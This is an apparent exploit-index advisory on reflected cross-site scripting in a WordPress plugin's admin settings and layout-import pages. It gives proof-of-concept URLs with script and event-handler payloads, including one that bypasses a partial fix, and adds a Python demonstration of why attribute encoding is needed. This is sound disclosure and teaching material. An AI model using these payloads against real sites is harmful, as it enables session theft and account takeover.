## https://sploitus.com/exploit?id=WPEX-ID:1FC0AACE-BA85-4939-9007-D150960ADD4A
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
https://example.com/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

v2.1.4 partially fixed the issue but still allowed arbitrary attributes to be injected, e.g.:
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="+accesskey=X+onclick=alert(1)//

v2.1.5 removed a lot of the escaping done in 2.1.4; that escaping was put back in v2.1.8.
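
Why a fix that still allows attribute injection is only partial, as an added example (not the plugin's code and not part of the original advisory): it renders the page's two `tab` values with no encoding, with angle brackets stripped, and with full attribute encoding, then parses the markup to see what the element ends up with. The `<input>` template and the bracket-stripping filter are assumptions, since the page does not show the plugin's markup or what 2.1.4 actually changed.

```python
from html import escape
from html.parser import HTMLParser

# Assumed template: the page does not show the plugin's real markup.
TEMPLATE = '<input type="hidden" name="tab" value="{}">'
EXPECTED_ATTRS = {"type", "name", "value"}

# URL-decoded `tab` values taken from the page's proof-of-concept URLs.
TAB_SCRIPT = '"><script>alert(1)</script>'
TAB_ATTR = '" accesskey=X onclick=alert(1)//'

def render_raw(value):
    """No output encoding at all."""
    return TEMPLATE.format(value)

def render_strip_brackets(value):
    """Assumed stand-in for a partial fix: drops < and > but keeps quotes."""
    return TEMPLATE.format(value.replace("<", "").replace(">", ""))

def render_escaped(value):
    """Attribute-context encoding: &, <, > and both quote characters."""
    return TEMPLATE.format(escape(value, quote=True))

class TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []  # (tag name, [attribute names]) for each start tag

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))

def audit(html):
    """Parse rendered markup and report what the input value broke out into."""
    parser = TagCollector()
    parser.feed(html)
    parser.close()
    input_attrs = next((a for t, a in parser.tags if t == "input"), [])
    return {
        "script_tag": any(t == "script" for t, _ in parser.tags),
        "injected_attrs": sorted(set(input_attrs) - EXPECTED_ATTRS),
    }

if __name__ == "__main__":
    for render in (render_raw, render_strip_brackets, render_escaped):
        for value in (TAB_SCRIPT, TAB_ATTR):
            print(f"{render.__name__:22} {value!r:36} {audit(render(value))}")
```

In WordPress code the attribute-context encoder is `esc_attr()`; Python's `html.escape` only stands in for it here.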